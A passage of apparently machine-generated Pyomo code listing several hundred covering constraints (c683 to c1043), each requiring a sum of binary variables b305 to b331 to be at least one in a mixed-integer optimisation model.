m.c683 = Constraint(expr= m.b310 + m.b324 + m.b330 >= 1)
m.c684 = Constraint(expr= m.b310 + m.b323 + m.b331 >= 1)
m.c685 = Constraint(expr= m.b310 + m.b322 >= 1)
m.c686 = Constraint(expr= m.b310 + m.b321 + m.b329 >= 1)
m.c687 = Constraint(expr= m.b310 + m.b321 + m.b326 + m.b330 >= 1)
m.c688 = Constraint(expr= m.b310 + m.b321 + m.b325 + m.b331 >= 1)
m.c689 = Constraint(expr= m.b310 + m.b321 + m.b324 >= 1)
m.c690 = Constraint(expr= m.b310 + m.b320 + m.b331 >= 1)
m.c691 = Constraint(expr= m.b310 + m.b320 + m.b326 >= 1)
m.c692 = Constraint(expr= m.b310 + m.b319 >= 1)
m.c693 = Constraint(expr= m.b310 + m.b318 + m.b328 >= 1)
m.c694 = Constraint(expr= m.b310 + m.b318 + m.b326 + m.b329 >= 1)
m.c695 = Constraint(expr= m.b310 + m.b318 + m.b325 + m.b330 >= 1)
m.c696 = Constraint(expr= m.b310 + m.b318 + m.b324 + m.b331 >= 1)
m.c697 = Constraint(expr= m.b310 + m.b318 + m.b323 >= 1)
m.c698 = Constraint(expr= m.b310 + m.b318 + m.b321 + m.b330 >= 1)
m.c699 = Constraint(expr= m.b310 + m.b318 + m.b321 + m.b326 + m.b331 >= 1)
m.c700 = Constraint(expr= m.b310 + m.b318 + m.b321 + m.b325 >= 1)
m.c701 = Constraint(expr= m.b310 + m.b318 + m.b320 >= 1)
m.c702 = Constraint(expr= m.b310 + m.b317 + m.b329 >= 1)
m.c703 = Constraint(expr= m.b310 + m.b317 + m.b326 + m.b330 >= 1)
m.c704 = Constraint(expr= m.b310 + m.b317 + m.b325 + m.b331 >= 1)
m.c705 = Constraint(expr= m.b310 + m.b317 + m.b324 >= 1)
m.c706 = Constraint(expr= m.b310 + m.b317 + m.b321 + m.b331 >= 1)
m.c707 = Constraint(expr= m.b310 + m.b317 + m.b321 + m.b326 >= 1)
m.c708 = Constraint(expr= m.b310 + m.b317 + m.b320 >= 1)
m.c709 = Constraint(expr= m.b310 + m.b316 + m.b329 >= 1)
m.c710 = Constraint(expr= m.b310 + m.b316 + m.b326 + m.b330 >= 1)
m.c711 = Constraint(expr= m.b310 + m.b316 + m.b325 + m.b331 >= 1)
m.c712 = Constraint(expr= m.b310 + m.b316 + m.b324 >= 1)
m.c713 = Constraint(expr= m.b310 + m.b316 + m.b321 + m.b331 >= 1)
m.c714 = Constraint(expr= m.b310 + m.b316 + m.b321 + m.b326 >= 1)
m.c715 = Constraint(expr= m.b310 + m.b316 + m.b320 >= 1)
m.c716 = Constraint(expr= m.b310 + m.b315 + m.b330 >= 1)
m.c717 = Constraint(expr= m.b310 + m.b315 + m.b326 + m.b331 >= 1)
m.c718 = Constraint(expr= m.b310 + m.b315 + m.b325 >= 1)
m.c719 = Constraint(expr= m.b310 + m.b315 + m.b321 >= 1)
m.c720 = Constraint(expr= m.b310 + m.b314 + m.b331 >= 1)
m.c721 = Constraint(expr= m.b310 + m.b314 + m.b326 >= 1)
m.c722 = Constraint(expr= m.b310 + m.b314 + m.b321 >= 1)
m.c723 = Constraint(expr= m.b309 + m.b328 >= 1)
m.c724 = Constraint(expr= m.b309 + m.b326 + m.b329 >= 1)
m.c725 = Constraint(expr= m.b309 + m.b325 + m.b330 >= 1)
m.c726 = Constraint(expr= m.b309 + m.b324 + m.b331 >= 1)
m.c727 = Constraint(expr= m.b309 + m.b323 >= 1)
m.c728 = Constraint(expr= m.b309 + m.b321 + m.b330 >= 1)
m.c729 = Constraint(expr= m.b309 + m.b321 + m.b326 + m.b331 >= 1)
m.c730 = Constraint(expr= m.b309 + m.b321 + m.b325 >= 1)
m.c731 = Constraint(expr= m.b309 + m.b320 >= 1)
m.c732 = Constraint(expr= m.b309 + m.b318 + m.b329 >= 1)
m.c733 = Constraint(expr= m.b309 + m.b318 + m.b326 + m.b330 >= 1)
m.c734 = Constraint(expr= m.b309 + m.b318 + m.b325 + m.b331 >= 1)
m.c735 = Constraint(expr= m.b309 + m.b318 + m.b324 >= 1)
m.c736 = Constraint(expr= m.b309 + m.b318 + m.b321 + m.b331 >= 1)
m.c737 = Constraint(expr= m.b309 + m.b318 + m.b321 + m.b326 >= 1)
m.c738 = Constraint(expr= m.b309 + m.b318 + m.b320 >= 1)
m.c739 = Constraint(expr= m.b309 + m.b317 + m.b329 >= 1)
m.c740 = Constraint(expr= m.b309 + m.b317 + m.b326 + m.b330 >= 1)
m.c741 = Constraint(expr= m.b309 + m.b317 + m.b325 >= 1)
m.c742 = Constraint(expr= m.b309 + m.b317 + m.b321 + m.b331 >= 1)
m.c743 = Constraint(expr= m.b309 + m.b317 + m.b321 + m.b326 >= 1)
m.c744 = Constraint(expr= m.b309 + m.b317 + m.b320 >= 1)
m.c745 = Constraint(expr= m.b309 + m.b316 + m.b330 >= 1)
m.c746 = Constraint(expr= m.b309 + m.b316 + m.b326 + m.b331 >= 1)
m.c747 = Constraint(expr= m.b309 + m.b316 + m.b325 >= 1)
m.c748 = Constraint(expr= m.b309 + m.b316 + m.b321 >= 1)
m.c749 = Constraint(expr= m.b309 + m.b315 + m.b331 >= 1)
m.c750 = Constraint(expr= m.b309 + m.b315 + m.b326 >= 1)
m.c751 = Constraint(expr= m.b309 + m.b315 + m.b321 >= 1)
m.c752 = Constraint(expr= m.b308 + m.b329 >= 1)
m.c753 = Constraint(expr= m.b308 + m.b326 + m.b330 >= 1)
m.c754 = Constraint(expr= m.b308 + m.b325 + m.b331 >= 1)
m.c755 = Constraint(expr= m.b308 + m.b324 >= 1)
m.c756 = Constraint(expr= m.b308 + m.b321 + m.b331 >= 1)
m.c757 = Constraint(expr= m.b308 + m.b321 + m.b326 >= 1)
m.c758 = Constraint(expr= m.b308 + m.b320 >= 1)
m.c759 = Constraint(expr= m.b308 + m.b318 + m.b329 >= 1)
m.c760 = Constraint(expr= m.b308 + m.b318 + m.b326 + m.b331 >= 1)
m.c761 = Constraint(expr= m.b308 + m.b318 + m.b325 >= 1)
m.c762 = Constraint(expr= m.b308 + m.b318 + m.b321 >= 1)
m.c763 = Constraint(expr= m.b308 + m.b317 + m.b330 >= 1)
m.c764 = Constraint(expr= m.b308 + m.b317 + m.b326 + m.b331 >= 1)
m.c765 = Constraint(expr= m.b308 + m.b317 + m.b325 >= 1)
m.c766 = Constraint(expr= m.b308 + m.b317 + m.b321 >= 1)
m.c767 = Constraint(expr= m.b308 + m.b316 + m.b331 >= 1)
m.c768 = Constraint(expr= m.b308 + m.b316 + m.b326 >= 1)
m.c769 = Constraint(expr= m.b308 + m.b316 + m.b321 >= 1)
m.c770 = Constraint(expr= m.b307 + m.b331 >= 1)
m.c771 = Constraint(expr= m.b307 + m.b326 >= 1)
m.c772 = Constraint(expr= m.b307 + m.b321 >= 1)
m.c773 = Constraint(expr= m.b306 + m.b327 >= 1)
m.c774 = Constraint(expr= m.b306 + m.b325 + m.b328 >= 1)
m.c775 = Constraint(expr= m.b306 + m.b324 + m.b329 >= 1)
m.c776 = Constraint(expr= m.b306 + m.b323 + m.b330 >= 1)
m.c777 = Constraint(expr= m.b306 + m.b322 >= 1)
m.c778 = Constraint(expr= m.b306 + m.b321 + m.b328 >= 1)
m.c779 = Constraint(expr= m.b306 + m.b321 + m.b326 + m.b329 >= 1)
m.c780 = Constraint(expr= m.b306 + m.b321 + m.b325 + m.b330 >= 1)
m.c781 = Constraint(expr= m.b306 + m.b321 + m.b324 + m.b331 >= 1)
m.c782 = Constraint(expr= m.b306 + m.b321 + m.b323 >= 1)
m.c783 = Constraint(expr= m.b306 + m.b320 + m.b330 >= 1)
m.c784 = Constraint(expr= m.b306 + m.b320 + m.b326 + m.b331 >= 1)
m.c785 = Constraint(expr= m.b306 + m.b320 + m.b325 >= 1)
m.c786 = Constraint(expr= m.b306 + m.b319 >= 1)
m.c787 = Constraint(expr= m.b306 + m.b318 + m.b327 >= 1)
m.c788 = Constraint(expr= m.b306 + m.b318 + m.b326 + m.b328 >= 1)
m.c789 = Constraint(expr= m.b306 + m.b318 + m.b325 + m.b329 >= 1)
m.c790 = Constraint(expr= m.b306 + m.b318 + m.b324 + m.b330 >= 1)
m.c791 = Constraint(expr= m.b306 + m.b318 + m.b323 + m.b331 >= 1)
m.c792 = Constraint(expr= m.b306 + m.b318 + m.b322 >= 1)
m.c793 = Constraint(expr= m.b306 + m.b318 + m.b321 + m.b329 >= 1)
m.c794 = Constraint(expr= m.b306 + m.b318 + m.b321 + m.b326 + m.b330 >= 1)
m.c795 = Constraint(expr= m.b306 + m.b318 + m.b321 + m.b325 + m.b331 >= 1)
m.c796 = Constraint(expr= m.b306 + m.b318 + m.b321 + m.b324 >= 1)
m.c797 = Constraint(expr= m.b306 + m.b318 + m.b320 + m.b331 >= 1)
m.c798 = Constraint(expr= m.b306 + m.b318 + m.b320 + m.b326 >= 1)
m.c799 = Constraint(expr= m.b306 + m.b318 + m.b319 >= 1)
m.c800 = Constraint(expr= m.b306 + m.b317 + m.b328 >= 1)
m.c801 = Constraint(expr= m.b306 + m.b317 + m.b325 + m.b329 >= 1)
m.c802 = Constraint(expr= m.b306 + m.b317 + m.b324 + m.b331 >= 1)
m.c803 = Constraint(expr= m.b306 + m.b317 + m.b323 >= 1)
m.c804 = Constraint(expr= m.b306 + m.b317 + m.b321 + m.b329 >= 1)
m.c805 = Constraint(expr= m.b306 + m.b317 + m.b321 + m.b326 + m.b330 >= 1)
m.c806 = Constraint(expr= m.b306 + m.b317 + m.b321 + m.b325 + m.b331 >= 1)
m.c807 = Constraint(expr= m.b306 + m.b317 + m.b321 + m.b324 >= 1)
m.c808 = Constraint(expr= m.b306 + m.b317 + m.b320 + m.b331 >= 1)
m.c809 = Constraint(expr= m.b306 + m.b317 + m.b320 + m.b326 >= 1)
m.c810 = Constraint(expr= m.b306 + m.b317 + m.b319 >= 1)
m.c811 = Constraint(expr= m.b306 + m.b316 + m.b328 >= 1)
m.c812 = Constraint(expr= m.b306 + m.b316 + m.b326 + m.b329 >= 1)
m.c813 = Constraint(expr= m.b306 + m.b316 + m.b325 + m.b330 >= 1)
m.c814 = Constraint(expr= m.b306 + m.b316 + m.b324 + m.b331 >= 1)
m.c815 = Constraint(expr= m.b306 + m.b316 + m.b323 >= 1)
m.c816 = Constraint(expr= m.b306 + m.b316 + m.b321 + m.b330 >= 1)
m.c817 = Constraint(expr= m.b306 + m.b316 + m.b321 + m.b326 + m.b331 >= 1)
m.c818 = Constraint(expr= m.b306 + m.b316 + m.b321 + m.b325 >= 1)
m.c819 = Constraint(expr= m.b306 + m.b316 + m.b320 >= 1)
m.c820 = Constraint(expr= m.b306 + m.b315 + m.b329 >= 1)
m.c821 = Constraint(expr= m.b306 + m.b315 + m.b326 + m.b330 >= 1)
m.c822 = Constraint(expr= m.b306 + m.b315 + m.b325 + m.b331 >= 1)
m.c823 = Constraint(expr= m.b306 + m.b315 + m.b324 >= 1)
m.c824 = Constraint(expr= m.b306 + m.b315 + m.b321 + m.b331 >= 1)
m.c825 = Constraint(expr= m.b306 + m.b315 + m.b321 + m.b326 >= 1)
m.c826 = Constraint(expr= m.b306 + m.b315 + m.b320 >= 1)
m.c827 = Constraint(expr= m.b306 + m.b314 + m.b330 >= 1)
m.c828 = Constraint(expr= m.b306 + m.b314 + m.b326 + m.b331 >= 1)
m.c829 = Constraint(expr= m.b306 + m.b314 + m.b325 >= 1)
m.c830 = Constraint(expr= m.b306 + m.b314 + m.b321 >= 1)
m.c831 = Constraint(expr= m.b306 + m.b312 + m.b327 >= 1)
m.c832 = Constraint(expr= m.b306 + m.b312 + m.b326 + m.b328 >= 1)
m.c833 = Constraint(expr= m.b306 + m.b312 + m.b325 + m.b329 >= 1)
m.c834 = Constraint(expr= m.b306 + m.b312 + m.b324 + m.b330 >= 1)
m.c835 = Constraint(expr= m.b306 + m.b312 + m.b323 + m.b331 >= 1)
m.c836 = Constraint(expr= m.b306 + m.b312 + m.b322 >= 1)
m.c837 = Constraint(expr= m.b306 + m.b312 + m.b321 + m.b329 >= 1)
m.c838 = Constraint(expr= m.b306 + m.b312 + m.b321 + m.b326 + m.b330 >= 1)
m.c839 = Constraint(expr= m.b306 + m.b312 + m.b321 + m.b325 + m.b331 >= 1)
m.c840 = Constraint(expr= m.b306 + m.b312 + m.b321 + m.b324 >= 1)
m.c841 = Constraint(expr= m.b306 + m.b312 + m.b320 + m.b331 >= 1)
m.c842 = Constraint(expr= m.b306 + m.b312 + m.b320 + m.b326 >= 1)
m.c843 = Constraint(expr= m.b306 + m.b312 + m.b319 >= 1)
m.c844 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b328 >= 1)
m.c845 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b326 + m.b329 >= 1)
m.c846 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b325 + m.b330 >= 1)
m.c847 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b324 + m.b331 >= 1)
m.c848 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b323 >= 1)
m.c849 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b321 + m.b330 >= 1)
m.c850 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b321 + m.b326 + m.b331 >= 1)
m.c851 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b321 + m.b325 >= 1)
m.c852 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b320 >= 1)
m.c853 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b328 >= 1)
m.c854 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b326 + m.b329 >= 1)
m.c855 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b325 + m.b330 >= 1)
m.c856 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b324 + m.b331 >= 1)
m.c857 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b323 >= 1)
m.c858 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b321 + m.b330 >= 1)
m.c859 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b321 + m.b326 + m.b331 >= 1)
m.c860 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b321 + m.b325 >= 1)
m.c861 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b320 >= 1)
m.c862 = Constraint(expr= m.b306 + m.b312 + m.b316 + m.b329 >= 1)
m.c863 = Constraint(expr= m.b306 + m.b312 + m.b316 + m.b326 + m.b330 >= 1)
m.c864 = Constraint(expr= m.b306 + m.b312 + m.b316 + m.b325 + m.b331 >= 1)
m.c865 = Constraint(expr= m.b306 + m.b312 + m.b316 + m.b324 >= 1)
m.c866 = Constraint(expr= m.b306 + m.b312 + m.b316 + m.b321 + m.b331 >= 1)
m.c867 = Constraint(expr= m.b306 + m.b312 + m.b316 + m.b321 + m.b326 >= 1)
m.c868 = Constraint(expr= m.b306 + m.b312 + m.b316 + m.b320 >= 1)
m.c869 = Constraint(expr= m.b306 + m.b312 + m.b315 + m.b330 >= 1)
m.c870 = Constraint(expr= m.b306 + m.b312 + m.b315 + m.b326 + m.b331 >= 1)
m.c871 = Constraint(expr= m.b306 + m.b312 + m.b315 + m.b325 >= 1)
m.c872 = Constraint(expr= m.b306 + m.b312 + m.b315 + m.b321 >= 1)
m.c873 = Constraint(expr= m.b306 + m.b312 + m.b314 + m.b331 >= 1)
m.c874 = Constraint(expr= m.b306 + m.b312 + m.b314 + m.b326 >= 1)
m.c875 = Constraint(expr= m.b306 + m.b312 + m.b314 + m.b321 >= 1)
m.c876 = Constraint(expr= m.b306 + m.b311 + m.b327 >= 1)
m.c877 = Constraint(expr= m.b306 + m.b311 + m.b326 + m.b328 >= 1)
m.c878 = Constraint(expr= m.b306 + m.b311 + m.b325 + m.b329 >= 1)
m.c879 = Constraint(expr= m.b306 + m.b311 + m.b324 + m.b331 >= 1)
m.c880 = Constraint(expr= m.b306 + m.b311 + m.b323 >= 1)
m.c881 = Constraint(expr= m.b306 + m.b311 + m.b321 + m.b329 >= 1)
m.c882 = Constraint(expr= m.b306 + m.b311 + m.b321 + m.b326 + m.b330 >= 1)
m.c883 = Constraint(expr= m.b306 + m.b311 + m.b321 + m.b325 + m.b331 >= 1)
m.c884 = Constraint(expr= m.b306 + m.b311 + m.b321 + m.b324 >= 1)
m.c885 = Constraint(expr= m.b306 + m.b311 + m.b320 >= 1)
m.c886 = Constraint(expr= m.b306 + m.b311 + m.b318 + m.b328 >= 1)
m.c887 = Constraint(expr= m.b306 + m.b311 + m.b318 + m.b326 + m.b329 >= 1)
m.c888 = Constraint(expr= m.b306 + m.b311 + m.b318 + m.b325 + m.b330 >= 1)
m.c889 = Constraint(expr= m.b306 + m.b311 + m.b318 + m.b324 + m.b331 >= 1)
m.c890 = Constraint(expr= m.b306 + m.b311 + m.b318 + m.b323 >= 1)
m.c891 = Constraint(expr= m.b306 + m.b311 + m.b318 + m.b321 + m.b330 >= 1)
m.c892 = Constraint(expr= m.b306 + m.b311 + m.b318 + m.b321 + m.b326 + m.b331 >= 1)
m.c893 = Constraint(expr= m.b306 + m.b311 + m.b318 + m.b321 + m.b325 >= 1)
m.c894 = Constraint(expr= m.b306 + m.b311 + m.b318 + m.b320 >= 1)
m.c895 = Constraint(expr= m.b306 + m.b311 + m.b317 + m.b329 >= 1)
m.c896 = Constraint(expr= m.b306 + m.b311 + m.b317 + m.b326 + m.b330 >= 1)
m.c897 = Constraint(expr= m.b306 + m.b311 + m.b317 + m.b325 + m.b331 >= 1)
m.c898 = Constraint(expr= m.b306 + m.b311 + m.b317 + m.b324 >= 1)
m.c899 = Constraint(expr= m.b306 + m.b311 + m.b317 + m.b321 + m.b331 >= 1)
m.c900 = Constraint(expr= m.b306 + m.b311 + m.b317 + m.b321 + m.b326 >= 1)
m.c901 = Constraint(expr= m.b306 + m.b311 + m.b317 + m.b320 >= 1)
m.c902 = Constraint(expr= m.b306 + m.b311 + m.b316 + m.b330 >= 1)
m.c903 = Constraint(expr= m.b306 + m.b311 + m.b316 + m.b326 + m.b331 >= 1)
m.c904 = Constraint(expr= m.b306 + m.b311 + m.b316 + m.b325 >= 1)
m.c905 = Constraint(expr= m.b306 + m.b311 + m.b316 + m.b321 >= 1)
m.c906 = Constraint(expr= m.b306 + m.b311 + m.b315 + m.b331 >= 1)
m.c907 = Constraint(expr= m.b306 + m.b311 + m.b315 + m.b326 >= 1)
m.c908 = Constraint(expr= m.b306 + m.b311 + m.b315 + m.b321 >= 1)
m.c909 = Constraint(expr= m.b306 + m.b310 + m.b328 >= 1)
m.c910 = Constraint(expr= m.b306 + m.b310 + m.b326 + m.b329 >= 1)
m.c911 = Constraint(expr= m.b306 + m.b310 + m.b325 + m.b330 >= 1)
m.c912 = Constraint(expr= m.b306 + m.b310 + m.b324 + m.b331 >= 1)
m.c913 = Constraint(expr= m.b306 + m.b310 + m.b323 >= 1)
m.c914 = Constraint(expr= m.b306 + m.b310 + m.b321 + m.b330 >= 1)
m.c915 = Constraint(expr= m.b306 + m.b310 + m.b321 + m.b326 + m.b331 >= 1)
m.c916 = Constraint(expr= m.b306 + m.b310 + m.b321 + m.b325 >= 1)
m.c917 = Constraint(expr= m.b306 + m.b310 + m.b320 >= 1)
m.c918 = Constraint(expr= m.b306 + m.b310 + m.b318 + m.b329 >= 1)
m.c919 = Constraint(expr= m.b306 + m.b310 + m.b318 + m.b326 + m.b330 >= 1)
m.c920 = Constraint(expr= m.b306 + m.b310 + m.b318 + m.b325 + m.b331 >= 1)
m.c921 = Constraint(expr= m.b306 + m.b310 + m.b318 + m.b324 >= 1)
m.c922 = Constraint(expr= m.b306 + m.b310 + m.b318 + m.b321 + m.b331 >= 1)
m.c923 = Constraint(expr= m.b306 + m.b310 + m.b318 + m.b321 + m.b326 >= 1)
m.c924 = Constraint(expr= m.b306 + m.b310 + m.b318 + m.b320 >= 1)
m.c925 = Constraint(expr= m.b306 + m.b310 + m.b317 + m.b330 >= 1)
m.c926 = Constraint(expr= m.b306 + m.b310 + m.b317 + m.b326 + m.b331 >= 1)
m.c927 = Constraint(expr= m.b306 + m.b310 + m.b317 + m.b325 >= 1)
m.c928 = Constraint(expr= m.b306 + m.b310 + m.b317 + m.b321 >= 1)
m.c929 = Constraint(expr= m.b306 + m.b310 + m.b316 + m.b331 >= 1)
m.c930 = Constraint(expr= m.b306 + m.b310 + m.b316 + m.b326 >= 1)
m.c931 = Constraint(expr= m.b306 + m.b310 + m.b316 + m.b321 >= 1)
m.c932 = Constraint(expr= m.b306 + m.b310 + m.b315 + m.b331 >= 1)
m.c933 = Constraint(expr= m.b306 + m.b310 + m.b315 + m.b326 >= 1)
m.c934 = Constraint(expr= m.b306 + m.b310 + m.b315 + m.b321 >= 1)
m.c935 = Constraint(expr= m.b306 + m.b309 + m.b329 >= 1)
m.c936 = Constraint(expr= m.b306 + m.b309 + m.b326 + m.b330 >= 1)
m.c937 = Constraint(expr= m.b306 + m.b309 + m.b325 + m.b331 >= 1)
m.c938 = Constraint(expr= m.b306 + m.b309 + m.b324 >= 1)
m.c939 = Constraint(expr= m.b306 + m.b309 + m.b321 + m.b331 >= 1)
m.c940 = Constraint(expr= m.b306 + m.b309 + m.b321 + m.b326 >= 1)
m.c941 = Constraint(expr= m.b306 + m.b309 + m.b320 >= 1)
m.c942 = Constraint(expr= m.b306 + m.b309 + m.b318 + m.b330 >= 1)
m.c943 = Constraint(expr= m.b306 + m.b309 + m.b318 + m.b326 + m.b331 >= 1)
m.c944 = Constraint(expr= m.b306 + m.b309 + m.b318 + m.b325 >= 1)
m.c945 = Constraint(expr= m.b306 + m.b309 + m.b318 + m.b321 >= 1)
m.c946 = Constraint(expr= m.b306 + m.b309 + m.b317 + m.b331 >= 1)
m.c947 = Constraint(expr= m.b306 + m.b309 + m.b317 + m.b326 >= 1)
m.c948 = Constraint(expr= m.b306 + m.b309 + m.b317 + m.b321 >= 1)
m.c949 = Constraint(expr= m.b306 + m.b308 + m.b330 >= 1)
m.c950 = Constraint(expr= m.b306 + m.b308 + m.b326 + m.b331 >= 1)
m.c951 = Constraint(expr= m.b306 + m.b308 + m.b325 >= 1)
m.c952 = Constraint(expr= m.b306 + m.b308 + m.b321 >= 1)
m.c953 = Constraint(expr= m.b306 + m.b308 + m.b318 + m.b331 >= 1)
m.c954 = Constraint(expr= m.b306 + m.b308 + m.b318 + m.b326 >= 1)
m.c955 = Constraint(expr= m.b306 + m.b308 + m.b318 + m.b321 >= 1)
m.c956 = Constraint(expr= m.b305 + m.b327 >= 1)
m.c957 = Constraint(expr= m.b305 + m.b326 + m.b328 >= 1)
m.c958 = Constraint(expr= m.b305 + m.b325 + m.b329 >= 1)
m.c959 = Constraint(expr= m.b305 + m.b324 + m.b330 >= 1)
m.c960 = Constraint(expr= m.b305 + m.b323 + m.b331 >= 1)
m.c961 = Constraint(expr= m.b305 + m.b322 >= 1)
m.c962 = Constraint(expr= m.b305 + m.b321 + m.b329 >= 1)
m.c963 = Constraint(expr= m.b305 + m.b321 + m.b326 + m.b330 >= 1)
m.c964 = Constraint(expr= m.b305 + m.b321 + m.b325 + m.b331 >= 1)
m.c965 = Constraint(expr= m.b305 + m.b321 + m.b324 >= 1)
m.c966 = Constraint(expr= m.b305 + m.b320 + m.b331 >= 1)
m.c967 = Constraint(expr= m.b305 + m.b320 + m.b326 >= 1)
m.c968 = Constraint(expr= m.b305 + m.b319 >= 1)
m.c969 = Constraint(expr= m.b305 + m.b318 + m.b328 >= 1)
m.c970 = Constraint(expr= m.b305 + m.b318 + m.b326 + m.b329 >= 1)
m.c971 = Constraint(expr= m.b305 + m.b318 + m.b325 + m.b330 >= 1)
m.c972 = Constraint(expr= m.b305 + m.b318 + m.b324 + m.b331 >= 1)
m.c973 = Constraint(expr= m.b305 + m.b318 + m.b323 >= 1)
m.c974 = Constraint(expr= m.b305 + m.b318 + m.b321 + m.b330 >= 1)
m.c975 = Constraint(expr= m.b305 + m.b318 + m.b321 + m.b326 + m.b331 >= 1)
m.c976 = Constraint(expr= m.b305 + m.b318 + m.b321 + m.b325 >= 1)
m.c977 = Constraint(expr= m.b305 + m.b318 + m.b320 >= 1)
m.c978 = Constraint(expr= m.b305 + m.b317 + m.b329 >= 1)
m.c979 = Constraint(expr= m.b305 + m.b317 + m.b326 + m.b330 >= 1)
m.c980 = Constraint(expr= m.b305 + m.b317 + m.b325 + m.b331 >= 1)
m.c981 = Constraint(expr= m.b305 + m.b317 + m.b324 >= 1)
m.c982 = Constraint(expr= m.b305 + m.b317 + m.b321 + m.b331 >= 1)
m.c983 = Constraint(expr= m.b305 + m.b317 + m.b321 + m.b326 >= 1)
m.c984 = Constraint(expr= m.b305 + m.b317 + m.b320 >= 1)
m.c985 = Constraint(expr= m.b305 + m.b316 + m.b330 >= 1)
m.c986 = Constraint(expr= m.b305 + m.b316 + m.b326 + m.b331 >= 1)
m.c987 = Constraint(expr= m.b305 + m.b316 + m.b325 >= 1)
m.c988 = Constraint(expr= m.b305 + m.b316 + m.b321 >= 1)
m.c989 = Constraint(expr= m.b305 + m.b315 + m.b331 >= 1)
m.c990 = Constraint(expr= m.b305 + m.b315 + m.b326 >= 1)
m.c991 = Constraint(expr= m.b305 + m.b315 + m.b321 >= 1)
m.c992 = Constraint(expr= m.b305 + m.b314 + m.b331 >= 1)
m.c993 = Constraint(expr= m.b305 + m.b314 + m.b326 >= 1)
m.c994 = Constraint(expr= m.b305 + m.b314 + m.b321 >= 1)
m.c995 = Constraint(expr= m.b305 + m.b312 + m.b328 >= 1)
m.c996 = Constraint(expr= m.b305 + m.b312 + m.b326 + m.b329 >= 1)
m.c997 = Constraint(expr= m.b305 + m.b312 + m.b325 + m.b330 >= 1)
m.c998 = Constraint(expr= m.b305 + m.b312 + m.b324 + m.b331 >= 1)
m.c999 = Constraint(expr= m.b305 + m.b312 + m.b323 >= 1)
m.c1000 = Constraint(expr= m.b305 + m.b312 + m.b321 + m.b330 >= 1)
m.c1001 = Constraint(expr= m.b305 + m.b312 + m.b321 + m.b326 + m.b331 >= 1)
m.c1002 = Constraint(expr= m.b305 + m.b312 + m.b321 + m.b325 >= 1)
m.c1003 = Constraint(expr= m.b305 + m.b312 + m.b320 >= 1)
m.c1004 = Constraint(expr= m.b305 + m.b312 + m.b318 + m.b329 >= 1)
m.c1005 = Constraint(expr= m.b305 + m.b312 + m.b318 + m.b326 + m.b330 >= 1)
m.c1006 = Constraint(expr= m.b305 + m.b312 + m.b318 + m.b325 + m.b331 >= 1)
m.c1007 = Constraint(expr= m.b305 + m.b312 + m.b318 + m.b324 >= 1)
m.c1008 = Constraint(expr= m.b305 + m.b312 + m.b318 + m.b321 + m.b331 >= 1)
m.c1009 = Constraint(expr= m.b305 + m.b312 + m.b318 + m.b321 + m.b326 >= 1)
m.c1010 = Constraint(expr= m.b305 + m.b312 + m.b318 + m.b320 >= 1)
m.c1011 = Constraint(expr= m.b305 + m.b312 + m.b317 + m.b330 >= 1)
m.c1012 = Constraint(expr= m.b305 + m.b312 + m.b317 + m.b326 + m.b331 >= 1)
m.c1013 = Constraint(expr= m.b305 + m.b312 + m.b317 + m.b325 >= 1)
m.c1014 = Constraint(expr= m.b305 + m.b312 + m.b317 + m.b321 >= 1)
m.c1015 = Constraint(expr= m.b305 + m.b312 + m.b316 + m.b331 >= 1)
m.c1016 = Constraint(expr= m.b305 + m.b312 + m.b316 + m.b326 >= 1)
m.c1017 = Constraint(expr= m.b305 + m.b312 + m.b316 + m.b321 >= 1)
m.c1018 = Constraint(expr= m.b305 + m.b312 + m.b315 + m.b331 >= 1)
m.c1019 = Constraint(expr= m.b305 + m.b312 + m.b315 + m.b326 >= 1)
m.c1020 = Constraint(expr= m.b305 + m.b312 + m.b315 + m.b321 >= 1)
m.c1021 = Constraint(expr= m.b305 + m.b311 + m.b329 >= 1)
m.c1022 = Constraint(expr= m.b305 + m.b311 + m.b326 + m.b330 >= 1)
m.c1023 = Constraint(expr= m.b305 + m.b311 + m.b325 + m.b331 >= 1)
m.c1024 = Constraint(expr= m.b305 + m.b311 + m.b324 >= 1)
m.c1025 = Constraint(expr= m.b305 + m.b311 + m.b321 + m.b331 >= 1)
m.c1026 = Constraint(expr= m.b305 + m.b311 + m.b321 + m.b326 >= 1)
m.c1027 = Constraint(expr= m.b305 + m.b311 + m.b320 >= 1)
m.c1028 = Constraint(expr= m.b305 + m.b311 + m.b318 + m.b330 >= 1)
m.c1029 = Constraint(expr= m.b305 + m.b311 + m.b318 + m.b326 + m.b331 >= 1)
m.c1030 = Constraint(expr= m.b305 + m.b311 + m.b318 + m.b325 >= 1)
m.c1031 = Constraint(expr= m.b305 + m.b311 + m.b318 + m.b321 >= 1)
m.c1032 = Constraint(expr= m.b305 + m.b311 + m.b317 + m.b331 >= 1)
m.c1033 = Constraint(expr= m.b305 + m.b311 + m.b317 + m.b325 >= 1)
m.c1034 = Constraint(expr= m.b305 + m.b311 + m.b317 + m.b321 >= 1)
m.c1035 = Constraint(expr= m.b305 + m.b311 + m.b316 + m.b331 >= 1)
m.c1036 = Constraint(expr= m.b305 + m.b311 + m.b316 + m.b326 >= 1)
m.c1037 = Constraint(expr= m.b305 + m.b311 + m.b316 + m.b321 >= 1)
m.c1038 = Constraint(expr= m.b305 + m.b310 + m.b330 >= 1)
m.c1039 = Constraint(expr= m.b305 + m.b310 + m.b326 + m.b331 >= 1)
m.c1040 = Constraint(expr= m.b305 + m.b310 + m.b325 >= 1)
m.c1041 = Constraint(expr= m.b305 + m.b310 + m.b321 >= 1)
m.c1042 = Constraint(expr= m.b305 + m.b310 + m.b318 + m.b331 >= 1)
m.c1043 = Constraint(expr= m.b305 + m.b310 + m.b318 + m.b325 >= 1)
